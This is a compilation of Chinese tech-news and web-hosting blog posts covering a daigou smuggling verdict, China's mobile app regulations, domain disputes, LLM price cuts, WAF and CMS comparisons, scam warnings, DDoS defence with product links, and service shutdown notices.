据判决书显示,2013年,被告人游燕开了名为“TSHOW进口女装店”的淘宝店用于销售进口高档服装,同年开始通过快递邮寄,雇请“水客”偷带及自行携带等方式走私进境,并销售牟利。 经统计,被告人游燕在香港刷卡购买并走私进境的服饰金额总计人民币11400558.93元,经核定,上述服饰偷逃税款共计人民币3005187.33元。 游燕走私了价值1000多万元的服饰,逃了300多万元的税,终审被判刑10年,罚款550万元。 就是这个量刑结果引发了网友的争议。 有人觉得,都是逃税,为什么游燕逃了300多万就要去坐牢? 必须得说明的是,游燕不仅是逃税,更涉及走私。 广东省高级人民法院认为,游燕违反国家法律、法规,走私普通货物进境后在国内销售牟利,偷逃应缴税额特别巨大,其行为已构成走私普通货物罪。 游燕偷逃应缴税额300余万元,数额特别巨大,依法应在有期徒刑十年以上量刑,并处偷逃应缴税额一倍以上五倍以下罚金或没收财产。 这都是《中华人民共和国刑法》中明确规定的。 第一百五十三条走私本法第一百五十一条、第一百五十二条、第三百四十七条规定以外的货物、物品的,根据情节轻重,分别依照下列规定处罚:(三)走私货物、物品偷逃应缴税额特别巨大或者有其他特别严重情节的,处十年以上有期徒刑或者无期徒刑,并处偷逃应缴税额一倍以上五倍以下罚金或者没收财产。 《最高人民法院、最高人民检察院关于办理走私刑事案件适用法律若干问题的解释》第十六条走私普通货物、物品,偷逃应缴税额在十万元以上不满五十万元的,应当认定为刑法第一百五十三条第一款规定的“偷逃应缴税额较大”;偷逃应缴税额在五十万元以上不满二百五十万元的,应当认定为“偷逃应缴税额巨大”;偷逃应缴税额在二百五十万元以上的,应当认定为“偷逃应缴税额特别巨大”。 因此,有网友对于这样量刑标准表示难以理解。相比其他恶性犯罪,这个是不是判太重了? 但也有网友表示,这种量刑是起到威慑作用的,不能因为“卖惨”就抹去之前违法乱纪的错误。 当然,还有网友更关心的是,代购是不是不能做了? 买家想着囤货,卖家已经想收摊了。 再次提醒一下,《中华人民共和国电子商务法》(简称《电商法》)将在明年1月1日正式实施,其中明确规定,所有电子商务经营者都应当办理市场主体登记,且依法履行纳税义务,电子商务经营者未取得相关行政许可从事经营活动的,将依照有关法律、行政法规的规定处罚。 未来,代购这个行业会消失吗? 文章转自IT时报:http://www.it-times.com.cn/a/hulianwang/2018/1105/24502.html #### 以后没有备案的APP将无法上线APP应用商店了 9 月 27 日消息,据国家网信办官方公告,2022 年 8 月 1 日《移动互联网应用程序信息服务管理规定》正式实施以来,国家互联网信息办公室依法依规组织开展应用程序分发平台备案管理工作。 基于此,国家网信办现公开发布第一批 26 家应用程序分发平台名称及备案编号,其中包括大家常见的小米、华为、OPPO、vivo、三星、联想、中兴、努比亚、酷派、咪咕、百度、360、快手、应用宝、微信小程序、QQ 小程序、支付宝小程序开放平台等等。 根据《移动互联网应用程序信息服务管理规定》有关要求,备案仅是对应用程序分发平台提供分发服务行为的确认,不代表对该平台服务能力和其在架应用程序的认可,任何平台和个人不得用于任何商业目的,不得违规从事其他业务。 今年 6 月 14 日,国家互联网信息办公室发布了新修订的《移动互联网应用程序信息服务管理规定》。 新《规定》自 2022 年 8 月 1 日起施行。国家互联网信息办公室有关负责人表示,修订发布新《规定》旨在进一步依法监管移动互联网应用程序,促进应用程序信息服务健康有序发展。 IT之家附《移动互联网应用程序信息服务管理规定》原文: 移动互联网应用程序信息服务管理规定 第一章 总则 第一条:为了规范移动互联网应用程序(以下简称应用程序)信息服务,保护公民、法人和其他组织的合法权益,维护国家安全和公共利益,根据《中华人民共和国网络安全法》、《中华人民共和国数据安全法》、《中华人民共和国个人信息保护法》、《中华人民共和国未成年人保护法》、《互联网信息服务管理办法》、《互联网新闻信息服务管理规定》、《网络信息内容生态治理规定》等法律、行政法规和国家有关规定,制定本规定。 第二条:在中华人民共和国境内提供应用程序信息服务,以及从事互联网应用商店等应用程序分发服务,应当遵守本规定。 本规定所称应用程序信息服务,是指通过应用程序向用户提供文字、图片、语音、视频等信息制作、复制、发布、传播等服务的活动,包括即时通讯、新闻资讯、知识问答、论坛社区、网络直播、电子商务、网络音视频、生活服务等类型。 本规定所称应用程序分发服务,是指通过互联网提供应用程序发布、下载、动态加载等服务的活动,包括应用商店、快应用中心、互联网小程序平台、浏览器插件平台等类型。 第三条:国家网信部门负责全国应用程序信息内容的监督管理工作。地方网信部门依据职责负责本行政区域内应用程序信息内容的监督管理工作。 第四条:应用程序提供者和应用程序分发平台应当遵守宪法、法律和行政法规,弘扬社会主义核心价值观,坚持正确政治方向、舆论导向和价值取向,遵循公序良俗,履行社会责任,维护清朗网络空间。 应用程序提供者和应用程序分发平台不得利用应用程序从事危害国家安全、扰乱社会秩序、侵犯他人合法权益等法律法规禁止的活动。 第五条:应用程序提供者和应用程序分发平台应当履行信息内容管理主体责任,积极配合国家实施网络可信身份战略,建立健全信息内容安全管理、信息内容生态治理、数据安全和个人信息保护、未成年人保护等管理制度,确保网络安全,维护良好网络生态。 第二章 应用程序提供者 第六条:应用程序提供者为用户提供信息发布、即时通讯等服务的,应当对申请注册的用户进行基于移动电话号码、身份证件号码或者统一社会信用代码等方式的真实身份信息认证。用户不提供真实身份信息,或者冒用组织机构、他人身份信息进行虚假注册的,不得为其提供相关服务。 第七条:应用程序提供者通过应用程序提供互联网新闻信息服务的,应当取得互联网新闻信息服务许可,禁止未经许可或者超越许可范围开展互联网新闻信息服务活动。 应用程序提供者提供其他互联网信息服务,依法须经有关主管部门审核同意或者取得相关许可的,经有关主管部门审核同意或者取得相关许可后方可提供服务。 第八条:应用程序提供者应当对信息内容呈现结果负责,不得生产传播违法信息,自觉防范和抵制不良信息。 应用程序提供者应当建立健全信息内容审核管理机制,建立完善用户注册、账号管理、信息审核、日常巡查、应急处置等管理措施,配备与服务规模相适应的专业人员和技术能力。 第九条:应用程序提供者不得通过虚假宣传、捆绑下载等行为,通过机器或者人工刷榜、刷量、控评等方式,或者利用违法和不良信息诱导用户下载。 第十条:应用程序应当符合相关国家标准的强制性要求。应用程序提供者发现应用程序存在安全缺陷、漏洞等风险时,应当立即采取补救措施,按照规定及时告知用户并向有关主管部门报告。 第十一条:应用程序提供者开展应用程序数据处理活动,应当履行数据安全保护义务,建立健全全流程数据安全管理制度,采取保障数据安全技术措施和其他安全措施,加强风险监测,不得危害国家安全、公共利益,不得损害他人合法权益。 第十二条:应用程序提供者处理个人信息应当遵循合法、正当、必要和诚信原则,具有明确、合理的目的并公开处理规则,遵守必要个人信息范围的有关规定,规范个人信息处理活动,采取必要措施保障个人信息安全,不得以任何理由强制要求用户同意个人信息处理行为,不得因用户不同意提供非必要个人信息,而拒绝用户使用其基本功能服务。 第十三条:应用程序提供者应当坚持最有利于未成年人的原则,关注未成年人健康成长,履行未成年人网络保护各项义务,依法严格落实未成年人用户账号真实身份信息注册和登录要求,不得以任何形式向未成年人用户提供诱导其沉迷的相关产品和服务,不得制作、复制、发布、传播含有危害未成年人身心健康内容的信息。 第十四条:应用程序提供者上线具有舆论属性或者社会动员能力的新技术、新应用、新功能,应当按照国家有关规定进行安全评估。 第十五条:鼓励应用程序提供者积极采用互联网协议第六版(IPv6)向用户提供信息服务。 第十六条:应用程序提供者应当依据法律法规和国家有关规定,制定并公开管理规则,与注册用户签订服务协议,明确双方相关权利义务。 对违反本规定及相关法律法规及服务协议的注册用户,应用程序提供者应当依法依约采取警示、限制功能、关闭账号等处置措施,保存记录并向有关主管部门报告。 第三章 应用程序分发平台 第十七:条应用程序分发平台应当在上线运营三十日内向所在地省、自治区、直辖市网信部门备案。办理备案时,应当提交以下材料: (一)平台运营主体基本情况; (二)平台名称、域名、接入服务、服务资质、上架应用程序类别等信息; (三)平台取得的经营性互联网信息服务许可或者非经营性互联网信息服务备案等材料; (四)本规定第五条要求建立健全的相关制度文件; (五)平台管理规则、服务协议等。 省、自治区、直辖市网信部门收到备案材料后,材料齐全的应当予以备案。 国家网信部门及时公布已经履行备案手续的应用程序分发平台名单。 第十八条:应用程序分发平台应当建立分类管理制度,对上架的应用程序实施分类管理,并按类别向其所在地省、自治区、直辖市网信部门备案应用程序。 第十九条:应用程序分发平台应当采取复合验证等措施,对申请上架的应用程序提供者进行基于移动电话号码、身份证件号码或者统一社会信用代码等多种方式相结合的真实身份信息认证。根据应用程序提供者的不同主体性质,公示提供者名称、统一社会信用代码等信息,方便社会监督查询。 第二十条:应用程序分发平台应当建立健全管理机制和技术手段,建立完善上架审核、日常管理、应急处置等管理措施。 应用程序分发平台应当对申请上架和更新的应用程序进行审核,发现应用程序名称、图标、简介存在违法和不良信息,与注册主体真实身份信息不相符,业务类型存在违法违规等情况的,不得为其提供服务。 应用程序提供的信息服务属于本规定第七条规定范围的,应用程序分发平台应当对相关许可等情况进行核验;属于本规定第十四条规定范围的,应用程序分发平台应当对安全评估情况进行核验。 应用程序分发平台应当加强对在架应用程序的日常管理,对含有违法和不良信息,下载量、评价指标等数据造假,存在数据安全风险隐患,违法违规收集使用个人信息,损害他人合法权益等的,不得为其提供服务。 第二十一条:应用程序分发平台应当依据法律法规和国家有关规定,制定并公开管理规则,与应用程序提供者签订服务协议,明确双方相关权利义务。 对违反本规定及相关法律法规及服务协议的应用程序,应用程序分发平台应当依法依约采取警示、暂停服务、下架等处置措施,保存记录并向有关主管部门报告。 第四章 监督管理 第二十二条:应用程序提供者和应用程序分发平台应当自觉接受社会监督,设置醒目、便捷的投诉举报入口,公布投诉举报方式,健全受理、处置、反馈等机制,及时处理公众投诉举报。 第二十三条:鼓励互联网行业组织建立健全行业自律机制,制定完善行业规范和自律公约,指导会员单位建立健全服务规范,依法依规提供信息服务,维护市场公平,促进行业健康发展。 第二十四条:网信部门会同有关主管部门建立健全工作机制,监督指导应用程序提供者和应用程序分发平台依法依规从事信息服务活动。 应用程序提供者和应用程序分发平台应当对网信部门和有关主管部门依法实施的监督检查予以配合,并提供必要的支持和协助。 第二十五条:应用程序提供者和应用程序分发平台违反本规定的,由网信部门和有关主管部门在职责范围内依照相关法律法规处理。 第五章 附则 第二十六条:本规定所称移动互联网应用程序,是指运行在移动智能终端上向用户提供信息服务的应用软件。 本规定所称移动互联网应用程序提供者,是指提供信息服务的移动互联网应用程序所有者或者运营者。 本规定所称移动互联网应用程序分发平台,是指提供移动互联网应用程序发布、下载、动态加载等分发服务的互联网信息服务提供者。 第二十七条:本规定自 2022 年 8 月 1 日起施行。2016 年 6 月 28 日公布的《移动互联网应用程序信息服务管理规定》同时废止。 #### 仲裁获胜!腾讯喜提 fuckqq.com 域名 4月27日消息:今年 3 月,有消息称腾讯控股将一纸投诉书投到亚洲域名争议解决中心香港秘书处,再次提出申请复审fuckqq.com域名。据AI财经社消息,经专家组裁决,腾讯已免费获得争议域名 fuckqq 所有权并会将其雪藏。 小编查询域名信息发现,fuckqq.com其实早在 2009 年 8 月就注册了。此前, 360 还因该域名指向 360 官网而躺枪。当年闹得沸沸扬扬,其实fuckqq.com域名的注册者为户口两位创业者徐贤标。 徐贤标接受采访时表示,自今年 3 月收到香港的仲裁通知邮件后,每晚下班后熬通宵研读法律条文、写辩护词,几乎没睡好觉。可惜……还是被收回了。 #### 价格战打起来了,百度文心大模型 ENIRE Speed、ENIRE Lite 全面免费 5 月 21 日消息,字节跳动上周发布了豆包大模型并宣布大模型价格进入“厘时代”,号称“比行业便宜 99.3%”。今日,阿里云也宣布通义千问 Qwen-Long 降价 97% 来应战。 现在,百度文心大模型更进一步,直接宣布其两款主力模型 ENIRE Speed、ENIRE Lite 全面免费,即刻生效。 这两款大模型发布于今年 3 月,支持 8K 和 128k 上下文长度。 根据百度官方介绍,ERNIE Speed 是百度 2024 年最新发布的自研高性能大语言模型,通用能力优异,适合作为基座模型进行精调,更好地处理特定场景问题,同时具备极佳的推理性能。 ERNIE Lite 是百度自研的轻量级大语言模型,兼顾优异的模型效果与推理性能,适合低算力 AI 加速卡推理使用。 #### 企业如何选?云WAF和硬件防火墙优缺点全解析(附成本明细) 云WAF和硬件防火墙(硬件WAF)在功能定位、部署方式、成本及适用场景上存在显著差异。以下是两者的详细对比分析及价格参考: 一、核心区别对比 对比维度云WAF硬件WAF部署方式基于云计算,通过DNS解析或反向代理接入,无需本地硬件设备。需本地部署物理设备,串联在网络中处理流量。扩展性弹性扩展,按需调整资源,支持突发流量和全球分布式节点。扩展性差,需购买额外硬件,成本高且周期长。成本按需付费(如每月数百至数千元),无硬件投入。初始成本高(几十万至百万级),需维护和更新费用。安全性依赖云端规则更新,存在绕过风险(如暴露源站IP)。数据本地处理,控制权高,适合敏感行业(如金融、政务)。维护复杂度由云服务商维护规则和基础设施,用户仅需配置策略。需专业团队维护硬件、更新规则,运维成本高。延迟与性能依赖网络传输,可能存在延迟,但通过CDN加速优化。本地处理流量,延迟低,适合对实时性要求高的场景。数据隐私流量需经过第三方云端,存在数据泄露风险。数据完全本地存储,隐私性和合规性更强。 二、价格范围参考 1. 云WAF 基础版:通常按域名数量或QPS(每秒请求数)计费,例如: 华为云标准版:约每月数百元,支持10个域名、2000 QPS。 阿里云/腾讯云:入门套餐约每月200-500元,含基础防护和CC攻击防御。 企业版:针对高流量场景,价格可达数千元/月,支持自定义规则和高级威胁检测。 2. 硬件WAF 设备成本:单台设备价格通常在 20万-100万元,高端型号可达数百万。 维护费用:年维护费约为设备成本的10%-20%,另需人工运维投入。 三、适用场景推荐 云WAF更适合: 中小型企业:预算有限,需快速部署且无需维护硬件。 多地域业务:需全球节点防护和CDN加速的场景。 弹性需求:流量波动大,需按需扩展资源(如电商大促)。 硬件WAF更适合: 高合规性行业:金融、政务等对数据本地化要求严格的领域。 低延迟需求:实时交易系统、内部网络等对延迟敏感的场景。 超大流量防护:日均亿级请求的大型企业,需稳定高性能处理。 四、选择建议 优先云WAF:若企业无严格数据本地化要求,且追求成本效益和灵活部署。 选择硬件WAF:若业务涉及敏感数据或需极致性能,且具备足够预算和运维能力。 混合方案:部分企业采用“云WAF+硬件WAF”组合,兼顾灵活性与核心业务安全。 五、未来趋势 智能化升级:云WAF正集成AI和机器学习,提升未知威胁检测能力。 RASP技术补充:运行时应用自保护(RASP)可弥补WAF的协议层盲区,降低误报率。 如需具体产品选型或报价,可参考华为云、阿里云等厂商的官方文档。 #### 企业建站选择 wordpress还是织梦在DEDECMS好 主机吧最近几天一直在帮朋友做一个企业站,起初主机吧选用的是wordpress,因为主机吧博客现在就是用worpdress的嘛,玩过一段时间比较了解。 但后来的现实让我果断放弃了用wordpress,而转投织梦CMS建设企业站。个人认为织梦CMS建设企业网站远比wordpress要好,为什么这么说呢,各位站长可以看下主机吧以下列举的几条缺点: 一、系统后台操作太难懂 一般企业站像什么发布产品,发布相册,织梦后台都一目了然,而worpdress后台只有一个发布文章功能,后台媒体插件什么的,企业网站管事员人根本看不懂。我们企业网站建设是给人家看的,不是给自己看的,他们看不懂,我们做得再好有什么意思呢? 二、企业免费模板太少 说到模板少,可能很多人反驳,wordpress企业模板一搜一大把,怎么会少呢?主机吧一开始也是这么认为,可是后面现实告诉我们,真的很少,免费的模板几乎没有,就算有也是垃圾那种,而收费的模板真的贵,几百上千都有。主机吧帮一个客户建个网站也就1000来块,花在模板上几百块钱显然是不值得了。而织梦模板却不同,免费的企业模板多得很,而且都很漂亮。主机吧很容易就找到了合适的模板了。 三、模板修改太难 也许是主机吧对wordpresss了解太少,下载好的模板很多需要实现的效果放在wordpress系统上根本无法实现,想要实现栏目页左侧单独内容设置,却需要大量修改文件来实现,实在是麻烦。 而织梦系统却不同,你几乎可以实现每个栏目不同的显示效果,操作也非常简单。 四、建设企业站太肿 说肿的意思是如果要实现企业站的基本要求,wordrpess需要装许多工具,插件来实现。比如产品展示,公司相册这些都需要装工具来实现,等你实现后,你会发现你的系统已经运行起来非常慢了。反而是织梦系统这些功能根本不需要装插件来实现,运行效率也相当高。   wordpress毕竟不是为企业建站而生,很多功能都是博客用的,甚至模板都是博客模板的多,所以企业建站,还是用织梦的好。织梦操作简单,而且设计符合国人操作理念。woredress是国外系统很多功能如果不深如了解根本不知道什么意思。 #### 企业收到网址续费函,这是一个骗局 最近有位企业客户收到了一张网址续费函,于是来咨询主机吧怎么回事? 主机吧看了下,这是一个彻头彻尾的骗局。 1.管理机构,没有万维网这个机构 2.域名续费年限5年价格18000元,简直骗得太离谱,目前COM域名普遍在80元左右一年。 3.23000元/长期,这个太离谱,域名最长续费不能超过10年,这个长期是什么时候叫? 综合上述,这个是一个骗子利用企业域名续费来骗人的,其实一般域名服务商,域名到期了顶多是发个邮箱、手机短信或者AI电话自动通知续费,根本不会发什么续费函,如果有人给你发什么函的,十有分九是骗人的,大家注意啦。 #### 企业网站交给建站公司建设你需要得到的权限 最近,一位客户网站遇到了DDOS攻击,想让主机帮给他做防御,但是主机帮在咨询后得知,该客户的网站是由建站公司帮搭建的,离谱的是客户没有这个网站的域名和服务器管理权限,每次操作都需要建站公司代为处理,而客户只有网站的后台登陆权限,这个情况主机帮在好几年前也遇到过,主机帮只能说,客户被建站公司忽悠了!今天主机帮来给那些没做过网站的同学科普下给建站公司做网站,你必须要得到的权限有哪些。 1.域名所有权 你需要拥有网站域名的所有权限,需要在域名注册商有自己的独立管理帐号,可以该网站的域名,同时域名注册时填写的所有者必须是你的,注意,必须是你自己注册的独立帐号,而不是由建站公司提供的。很多人为了图方便,把域名注册管理这些东西都托管建站公司了,这是不对的,后期如果建站公司倒闭跑路了,你连域名都没有了。 2.服务器管理权 你需要拥有网站互联网托管的服务器的管理权限,因为你网站的源代码、图片等文件、数据库都会存到这个服务器上,如果没有权限的话,未来建站公司倒了或者跟建站公司产生纠纷的话,网站的数据可能会拿不回来。因此,你需要跟域名一样,拥有独立的管理权限。 3.源码所有权 很多同学不知道,一些建站公司做的网站是暗藏授权的,他们会通过每年收授权费的方式收取费用,少的几百块一年,多的几千几万都有,如果到期没在他们那续费,那么网站就会无法正常使用。 因此,在网站建设的时候,一定要问清楚,以后有没有什么授权收费之类的,如果是那种需要每年交费的,就是需要时间授权的。不建议用这种,因为一些无良建站公司可能会坐地起价,而且建站公司倒闭了你的网站也就废了。 4.域名备案管理 一些公司为了图方便,在网站做ICP备案的时候,直接交给建站公司操作,这是不对的,ICP备案很重要,未来备案变更,注销之类的都是需要登陆备案系统操作的,这个不能给建站公司弄。 好了,以上就是网站建设中,你必须要拥有的权限,如果没有,千万别找这家公司做。     #### 企业网站因使用一张有版权的图片被告侵权 最近,在站长论坛一位站长反应,已经收到了法院传票,马上要开庭了。 原因是不知道哪个网站使用了使用对方的图片,被索赔1万元。 主机吧很久没有看到这类情况了,原因是现在做网站的企业少了,而且现在法院不支持这种“钓鱼式维权”了,判赔也非常少。 所以,主机吧怀疑这位站长可能被骗了,根本没有什么法院传票,可能是骗子骗人的把戏,当然也不排除是真的,可以打电话到官方查查,如果是真的,积极应对就行了,这种案件赔不了多少钱,对方还浪费时间。 #### 企业网站如何登陆百度口碑 百度口碑是百度旗下一家为企业评价口碑网站。企业可以在里面增加自己的官网,并可以增加官方微博、企业公众号、APP等相关资料。是企业网站宣传的必备网站,而且是免费的。 今天主机吧来教大家如何把自己的企业网站登陆到百度口碑,个人网站目前不支持收录。 首先我们登陆口碑网站koubei.baidu.com,在搜索框输入你的域名,如果域名没有收录的会自动跳转到申请收录页面   输入企业相关资料,并提交   申请通地后我们手机会收到短信。   收录成功后登陆认领页面https://ikoubei.baidu.com/claim/search,输入企业名字认领,并提交相关资料审核。审核通过后会手机短信通知的。 审核过后,我们进入口碑网站,商户中心,登陆后台,就可以看到企业相关资料了,我们需要的把企业网站资料填写完整     把内容填充完全即可,尤其是网站地址必须填写,这也是我们主要目的。填写完后还需要百度那边审核过了我们网站才会在口碑网站上搜索得到。 我们来看下效果:https://koubei.baidu.com/s/83eb81cd3d476addc4860c0dd1731bc6?src=searchexp 是不是感觉高大上了很多,赶紧去试试吧。 #### 企业网站已经开始强制升级IPV6了 去年主机吧就曾说过,政府网站开始强制IPV6了,今天看情况是轮到企业网站了。 今天有站长表示自己的企业网站接到工信部电话了,要求把网站升级支持IPV6,连社区都打电话过来要求升级。 由于全球IPV4资源的枯竭,目前升级IPV6已经迫在眉睫了,一些机房数据中心,甚至无IP可用了,尤其是现在这个物联网时代,IP资源更是稀缺,国内一直主导升级IPV6,IPV6理论上是无穷无尽的。甚至可以给地球上的每一粒沙分配一个IPV6。 目前国内政府网站已经全部升级IPV6了,一些重点网站应用也都升级IPV6了,我们的固定带宽也都是默认支持IPV6的,所以应该轮到普通企业网站了。 网站想要升级IPV6其实很简单,买个分配要IPV6的服务器部署就行了,或者直接部署CDN,目前国内主流CDN都是默认支持IPV6的,比如百度云加速,就是支持默认开启IPV6的。 #### 企业网站建设对企业有什么影响? 网站建设对企业的影响是非常大的。以下是一些具体的影响: 增强品牌形象:一个好的网站可以帮助企业建立品牌形象,展示产品或服务,吸引更多的潜在客户和用户,提高企业知名度和可信度。 扩大市场和客户基础:通过网站,企业可以扩大其市场和客户基础,实现线上销售和服务,满足消费者需求,拓展新的市场和业务机会。 提升客户满意度:通过网站提供更好的客户体验,例如网站易用性、响应速度、信息准确性等,可以提升客户满意度,增加客户忠诚度和口碑。 改善企业管理效率:网站不仅可以用于展示产品或服务,还可以作为企业内部管理工具,例如员工管理、客户关系管理、库存管理等,提高企业管理效率和工作效率。 降低营销成本:相对于传统的营销方式,网站建设可以降低企业的营销成本,例如在线广告、电子邮件营销、搜索引擎优化等,可以帮助企业在较低的成本下实现更广泛的营销覆盖面。 综上所述,网站建设对企业的影响是非常重要的,它可以帮助企业提高品牌形象、扩大市场、提升客户满意度、改善管理效率、降低营销成本等。因此,建议企业在发展战略规划时应考虑网站建设作为重要的一部分。 #### 企业网站建设必备的几样东西 简单的说下企业网站建设所需要的几样东西: 一、域名 简单易懂的域名有利于人们记住你的网站,纯数字或纯拼音最佳,比如huawei.com、360.com一眼就记住,后缀必须以COM、CN主流后缀域名,千万不能以非主流域名命名。 二、云服务器 高速稳定的云服务器是一个网站的基础,网民忍受一个网站的打开速度不超过38秒,但现在信息时代,几乎每个网站都在10秒内打开,如果超过10秒将影响用户对网站的体验,而稳定性将会影响搜索引擎对网站的评分,也保证网站不会在某些时间掉链子。 三、网站程序 网站程序涉及到安全、用户体验两个方面,一个安全网站程序必须要无漏洞,至少要无致命漏洞,要知道现在很多网站程序都很容易被挂马,一但被挂马无法修复对网站来说是致命的。好的用户体验网站程序体现网站设计必须合理,用户一眼看这个网站会有好感,而不是觉得乱七八糟的,同时程序响应速度必须要快,很多程序运行起来非常卡,用户访问几次就不想来了。现在是移动互联网时代,因此网站必须要有移动站,保证手机、平板电脑可以正常查看。 四、百度云加速 百度云加速集成网站加速、安全、SEO收录功能,是使网站推广锦上添花,其中以安全更为重要,要知道一个只要有盈利的网站,几乎100%会受到攻击,其中以DDoS、CC攻击最为突出,网站想要在互联网站稳脚跟,安全这块必须做到,以免因为攻击造成重要损失,百度云加速可有效解决DDoS、CC攻击,同时集成WAF功能,可拦截一些常规的非法扫描、漏洞攻击等,是网站运行中的好助手。 #### 企业网站遭遇DDOS攻击要怎么解决 应对企业网站DDOS攻击的紧急措施 当企业网站遭遇DDoS攻击时,应立即采取以下紧急措施: 识别和确认攻击:查询监控系统和流量分析工具识别流量是否异常,服务器CPU、内存、带宽峰值不否处理正常状态,必要时联系服务器商,确认是否为DDoS攻击。 关闭服务器:确认服务器正遭受DDOS攻击时,先关闭服务器连接网络,以免因DDOS攻击造成数据损失。 关闭域名解析:如遭遇CC攻击,可先删除解析至服务器IP,以免造成服务器网络堵塞。 紧急上线高防服务:启用高防服务进行流量清洗,高防CDN、高防IP均可防御DDOS攻击。 高防CDN推荐使用京东云星盾,京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。 购买地址:https://zhujib.com/shop/20576.html 高防IP推荐使用亿速云高防IP,高防IP是指具备高级防护能力的IP地址。它主要应用于防御大流量DDoS攻击,保护服务器免受攻击导致的服务不可用。高防IP能够有效防御DDoS攻击、CC攻击等恶意攻击,保护企业和个人的网站和服务器正常运行。 购买地址:https://www.suduwangluo.com/ip 长期防御策略 为了长期防御DDoS攻击,企业应: 优化网站架构:确保网站架构合理,及时修补漏洞,以防止黑客利用漏洞进行渗透攻击。 配置防火墙:在服务器上配置专业的防火墙,合理设置规则,有条件的配置WEB防火墙WAF。 使用高防CDN加速:通过CDN服务分散流量,减轻源站压力,同时拦截恶意攻击。 启用验证码机制:在关键操作环节引入验证码机制,防止恶意请求。 定期备份数据:建立定期备份机制,确保数据安全。 通过上述紧急措施和长期防御策略,企业可以有效应对DDoS攻击,保护网站安全稳定地运行。 WEB应用防火墙我们推荐使用百度云防护,百度云防护是百度旗下智能云提供的一种安全加速服务,通过智能DNS解析和动静态内容缓存技术,帮助用户提升业务的访问速度和用户体验。百度云防护集成了WAF、DDoS、CC防护能力,解决SQL 注入、XSS 跨站、Webshell 上传、非授权访问等多种 Web 服务攻击防护,有效解决 SYN Flood/ACK Flood/ICMP Flood/UDP Flood 等多种网络层 DDoS 攻击,以及 CC 攻击等应用层攻击, 云防护可应用于金融、电商、O2O、互联网+、游戏、保险、政府等各类网站。防护套餐集成了WAF、DDoS、CC防护能力,并包含CDN流量。可同时满足您的CDN 加速和综合安全防护需求。 详细购买地址:https://zhujib.com/shop/26864.html #### 企鹅电竞要终止运营啦! 4月7日 消息:4月7日,腾讯游戏官方直播平台企鹅电竞发布退市公告称,由于业务发展策略的变更 ,包括《企鹅电竞》(包括其网页端、App端、PC端、TV端、H5、微信小程序)以及《企鹅电竞直播助手》(包括其网页端、App端、PC端),将于 2022 年 6 月 7 日 23 时 59 分终止运营。 据悉, 2022 年 4 月 7 日 13 时 30 分,将停止新用户注册、新主播及新公会入驻,关闭充值; 2022 年 6 月 7 日 23 时 59 分,企鹅电竞相关产品的所有功能停止,企鹅电竞相关产品于各应用商店下架,企鹅电竞相关产品服务器关闭,正式停止运营,届时用户将无法登录企鹅电竞相关产品; 2022 年 6 月 7 日 23 时 59 分,主播的开播功能停止。 今年 3 月,有报道称,企鹅电竞正在大面积清退主播。 当时,企鹅电竞官方回应称,企鹅电竞在正常运营中,一切以官方通知为准。 资料显示,企鹅电竞是腾讯旗下规模最大的移动电竞平台,整合腾讯网、QQ手游、腾讯互娱团队资源,与QGC、TGA等职业电竞赛事深度合作,为玩家用户提供一站式的次世代移动电竞体验。 #### 优设标题黑免费商用字体 优设标题黑为永久免费可商用字体,包括注册商标、影视综艺节目内的字幕、花字、片头应用等均可。 优设标题黑字体由优设网(UI中国)设计并推出的。这种字体通常用于网页设计、广告设计、标题和标志等需要突出视觉效果的场合。它的特点在于笔画粗细适中,字形端正,适合作为大标题使用,以吸引读者的注意力。 优设标题黑设计初衷 这两年为了给读者更好的阅读体验,优设网/优优网的首屏 Banner 都有专人设计,为了让图片更有设计感和冲击感,每一张图我们都重新设计了字体。 久而久之设计师发现,越来越多的广告标题字会使用这类倾斜的、粗壮的黑体字。但目前市面上这类中文字库少之又少,多数还是需要设计师现做,这会耗费大量的时间和精力。 所以优设一直在想,是否能专门做一款针对标题的中文字体,开放给全社会的设计师免费商用,让更多人受益呢? 在最初有了要制作一款免费商用字体的想法时,正好遇到字由的朋友,我们一拍即合,达成了联合发布优设免费字体的共识。为了保证字体顺利快速的发布,优设邀请字由联合参与并对字体的质量把关,在优设制定完 300 多个基础字型、字母及符号的创意与规范后,字由接手继续从字库角度出发,整体完善优化字型,完成了6000多个字型的制作,并用了大量时间来进行产品化和字体细节方面的优化。 历经 100 多天,不断推翻和调整细节后,这款包括 6763 个汉字和字符的「优设标题黑」终于在优设 8 周年之际,正式上线了! 官网下载地址:https://www.uisdc.com/uisdc-first-free-font #### 优酷云相册将于 2022 年 1 月 31 日停止运营 1 月 14 日消息,据优酷云相册显示,由于业务调整,云相册将于停止运营,为了方便你更好地迁移文件,推荐你将文件转存至阿里云盘,你可继续在阿里云盘享受云存储服务。 界面提醒,文件仅可迁移一次,不可重复迁移;请于 2022 年 1 月 31 日前完成文件迁移。 优酷云相册一键迁移至阿里云盘,亮点包括免费超大容量,相册自动备份,高速上传下载,全网资源搜索,用户可以确认并同意《云相册迁移授权》,然后登录阿里云盘帐号并开始迁移。 #### 传谷歌和腾讯将进行深度合作 谷歌云业务将由腾讯代理 据The Information报道,知情人士透露,谷歌与腾讯正秘密接触,由腾讯代理运营谷歌云服务。如果计划顺利,那么谷歌云从数据库管理到网络安全服务、以及G-Suite套装等,将为中国客户提供。与此同时,腾讯的中国客户在出海时也可以使用谷歌云。据称,双方正共同努力改善云计算产品的兼容性,若达成合作,使用谷歌云和腾讯云两大云服务的客户的客户可节约成本。 报道称,谷歌并不打算在中国直接推出谷歌云,两家公司之间数据不会打通,这也是应中国法律要求数据留在国内的需要。该合作能够让在中国境外使用谷歌云服务的企业客户更容易获得腾讯在中国的类似服务,同时谷歌还无需在中国实际推出谷歌云服务。 对此,腾讯向界面新闻表示不予置评。 此前在8月4日,彭博报道称,谷歌正在与腾讯、浪潮和另一家中国公司进行谈判,谷歌已经将合作伙伴选择范围缩小至三家,根据协议,谷歌云将通过国内合作伙伴提供谷歌云服务。 出于信息安全的考虑,所有外资云在中国落地都必须与拥有IDC(互联网数据中心)牌照的国内企业合作,由国内企业负责日常运营。外资云成功落地获得牌照已有多例,世纪互联是微软云Azure的中国运营方。微软云在2013年中在华落地,是第一家进入中国的海外公有云。AWS在中国有两个区域云,其中北京区域云由光环新网运营,宁夏区域云由西云数据运营。 目前来看,微软模式并非谷歌云未来在中国提供云服务的首选模式。 